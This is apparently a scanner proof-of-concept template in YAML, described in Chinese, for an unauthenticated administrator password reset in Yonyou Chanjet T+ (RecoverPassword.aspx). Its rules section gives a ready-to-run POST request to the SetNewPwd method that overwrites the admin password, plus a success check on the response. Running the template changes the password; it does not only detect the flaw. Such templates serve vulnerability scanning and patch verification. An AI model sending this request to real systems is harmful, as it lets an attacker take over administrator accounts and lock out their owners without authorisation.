漏洞描述
用友 畅捷通T+ RecoverPassword.aspx 存在未授权管理员密码修改漏洞,攻击者可以通过漏洞修改管理员账号密码登录后台
app="畅捷通-TPlus"
id: yonyou-chanjet-tplus-password-reset
info:
name: 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
author: zan8in
severity: high
description: |
用友 畅捷通T+ RecoverPassword.aspx 存在未授权管理员密码修改漏洞,攻击者可以通过漏洞修改管理员账号密码登录后台
app="畅捷通-TPlus"
reference:
- http://wiki.peiqi.tech/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT+%20RecoverPassword.aspx%20%E7%AE%A1%E7%90%86%E5%91%98%E5%AF%86%E7%A0%81%E4%BF%AE%E6%94%B9%E6%BC%8F%E6%B4%9E.html
rules:
r0:
request:
method: POST
path: /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd
body: |
{"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"}
expression: response.status == 200 && response.body.bcontains(b'"value":') && response.body.bcontains(b'true')
expression: r0()